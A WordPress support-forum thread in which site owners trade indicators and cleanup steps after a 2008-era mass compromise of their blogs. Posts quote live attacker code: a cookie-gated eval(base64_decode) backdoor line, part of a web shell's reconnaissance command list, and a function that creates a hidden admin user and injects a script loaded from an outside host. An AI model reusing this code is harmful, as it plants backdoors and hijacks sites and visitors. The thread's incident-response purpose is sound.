The Support Forums will be in read-only mode for a scheduled maintenance window on 01 September 2016 14:00 UTC - 20:00 UTC. More information.

Security issue, multiple sites (54 posts)

  1. fpmsummer
    Posted 8 years ago #

    This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I'd cleaned those up and upgraded to 2.3.3, since 2.5 wasn't yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I'm still trying to unravel the mess and clean it up, but here's a rundown of tell-tale signs I've found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake "404 Not Found" error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven't yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don't know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there's a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database... usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn't been upgraded yet, was the silent addition of the user "WordPress", with no info save a password, and an add date of all zeroes. There's also no indication of user level in the database, and the user doesn't show up in the User menu. However, when I was going through and deleting unnecessary "admin" logins, "WordPress" came up as one of the user options to reassign posts to... otherwise it might have been a while before I'd found that buried in the database.

    So I've asked all the users on those sites to update their passwords, even if they'd just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I've listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new "WordPress" user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

    What I don't know yet is if one site was the "in" door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.

  2. fpmsummer
    Posted 8 years ago #

    Addendum: I only just noticed this this morning while still cleaning up, and it seems like they changed the WP version to 2.5 in the database.

    I'm logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now. I still haven't found a clue about this invisible user "WordPress" with no info about privileges, though.

  3. Roy
    Posted 8 years ago #

    There already is a thread about this subject and that one has just become active again. Maybe you want to join:

  4. jedsundwall
    Posted 8 years ago #


    I think FPMSummer is experiencing something different that what's being discussed on that other thread. I'm having the EXACT same problem. I've had to revert my server to a week and a half old backup. It's a huge pain. I can't tell if they accessed the wp-info.txt, but I deleted it right away.

  5. fpmsummer
    Posted 8 years ago #


    that's a different hack, but one that hit some sites on our ISP's shared server back in January/February. They removed like 8-10 instances of that .txt file.


    what version(s) of WP are you running? I had thought that a 2.3.x site that still had user registration turned on might be responsible, but at this point I honestly don't know where the first point of entry was, and I'm still not sure all of the users on this server have changed their passwords. I have changed all the database passwords, though.

  6. jedsundwall
    Posted 8 years ago #

    Like you, I had a number of sites running different versions. I believe most of them were the latest version before 2.5 was released. It's difficult to tell because the hacker has changed all of my WP dashboards to say they're running 2.5.

    All of the weird files showed up on April 10th or 11th, and I didn't notice them until today. My hosting company keep server logs for more than a couple of days, so I can't tell what the point of entry was either.

    I'm sorry I'm not of much help. All I know is that nothing obviously bad has happened yet. As soon as my server's finished reverting back to April 5th, I'll be upgrading everything right away.

  7. appleo
    Posted 8 years ago #

    No real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:

    <?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){

    I believe all of these were 'qwerty' cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:

    if($os_type == 'nix'){^M
    $os .= execute('sysctl -n kern.ostype');^M
    $os .= execute('sysctl -n kern.osrelease');^M
    $os .= execute('sysctl -n kernel.ostype');^M
    $os .= execute('sysctl -n kernel.osrelease');^M
    if(empty($user)) $user = execute('id');^M
    $aliases = array(^M
    '' => '',^M
    'find suid files'=>'find / -type f -perm -04000 -ls',^M
    'find sgid files'=>'find / -type f -perm -02000 -ls',^M
    'find all writable files in current dir'=>'find . -type f -perm -2 -ls',^M
    'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',^M
    'find all writable directories and files in current dir'=>'find . -perm -2 -ls',^M
    'show opened ports'=>'netstat -an | grep -i listen',^M
    $os_name .= execute('ver');^M
    $user .= execute('echo %username%');^M
    $aliases = array(^M
    '' => '',^M
    'show runing services' => 'net start',^M
    'show process list' => 'tasklist'^M
  8. fpmsummer
    Posted 8 years ago #

    Yep, that's exactly what showed up on my sites, and all on Apr 10 and Apr 11. The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed to have all been renamed _old.php, and the second batch of files were the exact same files, but with _new.php.

    I had a lot of WP files with that qwerty cookie added, and several instances of the wp-info.txt with the mysql usernames/passwords dump.

    I did find one file dated Apr 5, but I also saw a lot of log activity going back into March.

    And how did they change my Dashboard to show WP 2.5, when they weren't running 2.5?

  9. ia
    Posted 8 years ago #

    guys, i think somebody should "name" this vulnerability so it's easier to remember. also, i wrote about it here.

    yep, it happened to me too. i first saw the version 2.5 string in the footer and was immediately suspicious, but at first i thought it was because i used the wpau plugin instead of the cpanel upgrade (which i used to install wp the first time around). turns out you have to trust your instincts. :)

    i'm also surprised all this happened on april 11 (mine on the 12th) as well.

    i've been watching this page and will continue to do so. i hope more people contribute because it was only a few days ago when i tried googling "wp-info.txt" and practically nothing came up.

  10. whooami
    Posted 8 years ago #

    I would agree with anyone who says this isnt just a 2.5 problem


    The file itself appears to be gone. but because of google we can get more info

    That's a 2.3.3 install now. There's no telling what it was on March 19


    Futhermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken their security into their own hands for some time, and really ought not be surprised to wake up to a site that has been exploited.

  11. here
    Posted 8 years ago #

    Codex page will hopefully help document:


  12. goodspeed1
    Posted 8 years ago #

    We experienced everything mentioned above over the last couple of days. April 6th & 12th. It seems systematic. Once the accounts have been compromised. The hacking began.

    Here's a few more insights on what happened: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt

    steps taken:

    1. Changed the admin (level 10) account passwords
    2. Deleted the 'mysterious' WordPress admin user
    3. Upgraded most of major blogs to 2.5

    So far so good. (crossing my fingers)

  13. here
    Posted 8 years ago #

  14. indigothirdeye
    Posted 8 years ago #

    The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily, we have a script that checks for code changes, and caught the exploit within a half hour of the attack. The logs from our site that was hacked had this in the logs: - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 30
    2 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.
    php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 20
    0 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
    02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.
    1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
    US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; e
    n-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 3
    02 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/" - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/
    20070309 Firefox/"

    Both sites had the WordPress and WordPressx user added to the wp-users table. Neither had a wp-info.txt luckily, but many of the .giff and .pngg's were found. There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory listings of the sites. We immediately launched a "Deny any" on the theme-editor.php files to prevent further attacks using this method and cleaned up what we could find.

  15. whooami
    Posted 8 years ago #

    thats not the exploit. thats the file access that done after someone has admin access. AND if you attempt to call that file without being logged in, and having the proper permissions, you will find you are promptly redirected to logging in, just as you ought to be

    You cannot access that file as a simple subscriber. You must be an admin

    Devs (Donncha, specifically) has already looked at something similar weeks ago, when I originally saw it happening on another blog that hand been exploited.

    Want to know what ultimtely solved the hacking?

    1. upgrading the blog
    2. changing the admin passwords
    3. changing all the cookies.

    and the deny all.. that just forces apache to do work it doesnt need to. If you're going to block everyone from using the file, delete it, or crtl-k the content.

    You dont gain anything by looking at 403's -- theyre all proxies or rooted shells.

    None of this is new, and Im willing to continue playing devil's advocate and say that until someone comes up with real evidence that 2.5, or even 2.3 is the root cause of the problem.. that it's useless conjecture and fear mongering.

    If someone has admin access they do can do whatever your file permissions allow, it's just that simple. And if they can write to a file, they can create a root shell. If they can create a root shell, they can add users to your database, etc.. They also no longer need admin access once the php root shell is in place.

    Thats why when a new version comes out, ppl are urged to upgrade. Countless numbers dont.

    This is specifically why I have suggested setting up logging on some of these blogs --

    1. youre missing the key piece of the puzzle : how they got admin access in the first place.


    In fact, you posted the login in your paste above. They can be seen logging in.

  16. ia
    Posted 8 years ago #

    yeah, i do want to know how they got admin access as well. fyi, after i wrote about this security issue, the "WordPress" user appeared in the database(s) again. does this mean i'd have to generate new database passwords all over again? sigh.

  17. whooami
    Posted 8 years ago #

  18. fpmsummer
    Posted 8 years ago #

    If whooami found evidence that this particular hack was in use on March 19, there's no way that 2.5 was the "in" door, unless someone was using an RC.

    I still think that it was a 2.3.x site on my server that was hit first, then the script looking for write permissions did the rest, and it didn't matter what version a site was running after that. Once I'm sure everything here's clean again, I'll go back to the logs.

    I still want to know how they added that invisible WordPress user.

  19. Steve Taylor
    Posted 8 years ago #

    Sorry to hear y'all had the same problem - but nice to know I'm not alone! Same thing - April 11th, new files, code inserted into existing files, new "WordPress" admin account...

    One other indicator I found was entries in the wp_usermeta table - there seemed to be ones in there indicating admin permissions for entries in wp_user that didn't exist.

    I had 2.1.x installations on my server together with 2.3.3 and 2.5. I guessed that the former were hit and the latter suffered from that - I was stupidly running all installations through the same MySQL user login. All changed now...

    I did notice a new "WordPress" admin account pop up in a 2.5 installation (one closed from public access by .htaccess password), even after I'd deleted it. I subsequently found a *php.jpgg or whatever file I'd missed on the server; no more admin accounts since deleting that.

    Anyway, I don't have enough knowledge to determine how all this happened - just wanted to add my bits in case it clues someone else in.

    Now I've got separate DB logins for all installations, upgraded all to 2.5, changed "wp_" table prefix to 8 random characters, changed "admin" username, changed all WP passwords to strong random strings. I've learned a lot about security, but I'm exhausted! Touch wood this is the end of it.

  20. cweb
    Posted 8 years ago #

    All of my sites were hit by this, about five hosted on Media Temple. I'm sure the spam-bot went for the popular ISP IP ranges when scanning for WP installations.

    If it helps anyone, I did the following per recommendations from this article.

    This page was a lifesaver:

    1. keep searching for wp-info.txt to make sure it's not around, if so, delete it.

    find . -name wp-info*

    2. get rid of all _new _old .jpgg .giff and .pngg

    find . -name *_old* -exec rm '{}' \;

    3. find all instances of the backdoor account looks like

    <?php if(md5($_COOKIE['_wp_debugger'])=="randomhash"){

    Use grep to find this:

    grep -ri _wp_debugger * *.php

    Then do a global search and replace (for now) to replace _wp_debugger with 'unknown'

    find . -name '*.php' | xargs perl -pi -e 's/_wp_debugger/unknown/'

    4. I upgraded all installations to 2.5

    5. I used phpmyadmin to remove the hidden 'wordpress' user account from the wp_users table in the database

    6. I reset all user passwords by replace the MD5 hash through the database directly.

    I don't trust what files this hack might have tainted. For example, does it know when I've used the admin tools to reset passwords.

    My questions:

    - Does WordPress have any more details about what files this hack has tainted?
    - Do we know how the wp-info.txt file would be generated? I didn't see it in my folders, so I'm a little worried that it created a cron job or something that hasn't kicked off yet - any ideas?

  21. BurstCollective
    Posted 8 years ago #

    It seems like this is the type of attack we've suffered, as well, but we still get live hits when adding "/?p=4019.html" to the end of our blog URL (http://blog.burstlabs.com).

    Any ideas? I'm so frustrated and stumped right now. Argh.

  22. BurstCollective
    Posted 8 years ago #

    by "live hits" I mean pages that are obviously spam for drug companies, etc., but I can't find any post/page that is numbered 4019 (to use the above example) to delete.

  23. boscardin
    Posted 8 years ago #

    Apparently, it doesn't just affect the WordPress files. I've seen files created in other folders as well, so I'm going through each and every folder in my domain to remove these files.

  24. cweb
    Posted 8 years ago #

    Hey boscardin, what types of files are you seeing? Has anyone seen a full analysis of this hack other than the links mentioned here?

    So far it seems like my cleanup went okay but maybe I should be looking for more signs.

  25. cave-bit
    Posted 8 years ago #

    Excuse for my english...We have the problem in italian site speleo scintilena.com
    Y find the file create the username WordPress and password is sitename ($_SERVER['HTTP_HOST']).(This pass in users table is cripted md5)
    This filename is ha.php and find this in wp-admin directory.
    But y haven't idea how upload is.
    Y think upload width any plugin but not sure.
    Y find other site width this problem and y not damage his...but is is a big problem.
    We track the user WordPress in scintilena site and his ip is (we logged and redirect this user of fbi site)
    is an server located in USA width the house of company in Panama (info Whois)
    Y posted the code for study:

    function add_hidden_user() {
         global $wpdb;
         $user_login = "WordPress"; $user_pass = md5($_SERVER['HTTP_HOST']);
         $js_server = "http://search-again.net/js/js.js"; if(strlen($js_server)>33){die("Server does not fit to cell!");};
         if($wpdb->get_var("SELECT ID FROM $wpdb->users WHERE user_login='$user_login'")>0){
         	$wpdb->query("DELETE FROM $wpdb->users WHERE user_login='$user_login'");
         $users = $wpdb->get_results("SELECT * FROM $wpdb->users LIMIT 1");
         if(array_key_exists('display_name',$users[0])) {
              $query = "INSERT INTO $wpdb->users
                   (user_login, user_pass)
                   ('$user_login', '$user_pass')";
              $wpdb->query( $query );
              $user_id = $wpdb->insert_id;
              $up = array('first_name','last_name','nickname','description','jabber','aim','yim');
         <b id="user_superuser"><script language="JavaScript">
         var setUserName = function(){
                   var t=document.getElementById("user_superuser");
                   var tags = document.getElementsByTagName("H3");
                   var s = " shown below";
                   for (var i = 0; i < tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                             s =(parseInt(t)-1)+s;
                             t = document.createTextNode(s);
              foreach ($up as $k) {
                   if ($k='first_name') {$v=$wpdb->escape($js);};
                   update_usermeta( $user_id, $k, $v );
              $user = new WP_User($user_id);
              wp_cache_delete($user_id, 'users');
              wp_cache_delete($user_login, 'userlogins');
              if(md5($wpdb->get_var("SELECT meta_value FROM $wpdb->usermeta WHERE user_id='$user_id' AND meta_key='first_name'"))==md5($js)){
                   return "sucess";
              } else {
                   $wpdb->query("DELETE FROM $wpdb->usermeta WHERE user_id='$user_id'");
                   $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                   return "failed";
         } else {
              $js1 = '<b id="ux"><script language="JavaScript"';
              $js2 = ' src="'.$js_server.'"></script>';
              $query = "INSERT INTO $wpdb->users
                   (user_login, user_pass, user_level, user_firstname, user_lastname)
                   ('$user_login', '$user_pass', 10,'".$wpdb->escape($js1)."','".$wpdb->escape($js2)."' )";
              $wpdb->query( $query );
              $user_id = $wpdb->insert_id;
              if(md5($wpdb->get_var("SELECT user_firstname FROM $wpdb->users WHERE id='$user_id'"))==md5($js1) &&
                 md5($wpdb->get_var("SELECT user_lastname FROM $wpdb->users WHERE id='$user_id'"))==md5($js2)
                   return 1;
              } else {
                   $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                   return 0;

    If you solving please posted.
    Thanks and.. ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz

  26. fpmsummer
    Posted 8 years ago #

    Just as a followup, I was playing around with a database on one of the sites that had been hit (trying different things to resolve the "WordPress database error Duplicate entry" errors we've been getting from podpress ever since sites upgraded to 2.3, and I found something disturbing...

    In table wp_options, record active_plugins, I found 2 "active" plugins that don't register in the listing of plugins, and that reference bad files from the hacking.


    I was able to change the number of plugins and delete these extras to the entries, but I'm concerned because these didn't show up on a casual browse of the fields. I happened to see it when I was playing with a mysqldump of the database.

    It doesn't look like it was newly added... but it looks like this next round of files was added on Apr 14... probably while I was still cleaning up the mess from Apr 11.

    I hadn't noticed that anyone else here mentioned that little addition, like the invisible user WordPress that was added, but I have no idea what the invisible plugin is supposed to do. Could that session file in /tmp be a PHP shell? What should I look for to decode what it is?

  27. appleo
    Posted 8 years ago #

    The plot thickens. Have you looked at 404_old.gif. Reading your post, I picked one site, and also found a bogus theme: comments-popup_old.png (also an image name ... hmmmm). Here is a snippet from that odd looking content:


    This file is timestamped April 11th. I'll look for more later. There probably are many more left to unearth.

  28. appleo
    Posted 8 years ago #

    So far I have found 3 of these files. All are exactly 11128 bytes. Two had identical content, but not the third. Two were in non-WP directories (one was in an Apache log directory). All had image like names (one was jpg, one was jpeg and one png). I don't know if this is the end of this trail or not.

  29. ajparker
    Posted 8 years ago #

    It looks like those phantom-encrypted/encoded plugins are how they've "altered" the display version number.

    The first tip off I had something was wrong on one of my installs was upgrading to the new 2.5.1 - for some reason it claimed it was still running 2.5 - I wiped everything and tried again - still it claimed to be 2.5 - I checked the files and the version 2.5.1 is listed in the files - so I started looking closer - found the wp-info.txt as well as the WordPress user.

    I also found the /tmp/ file listed as a plugin and one in the classic theme folder which had identical encrypted/encoded content - removing the plugins was the last change that fixed the version number - these plugins were only shown in the database field - not in the admin area.

    Hopefully that's ALL the damage.

  30. BurstCollective
    Posted 8 years ago #

    but how do you edit those database fields? I think this is where I need to make a final sweep for miscreants.

Topic Closed

This topic has been closed to new replies.

About this Topic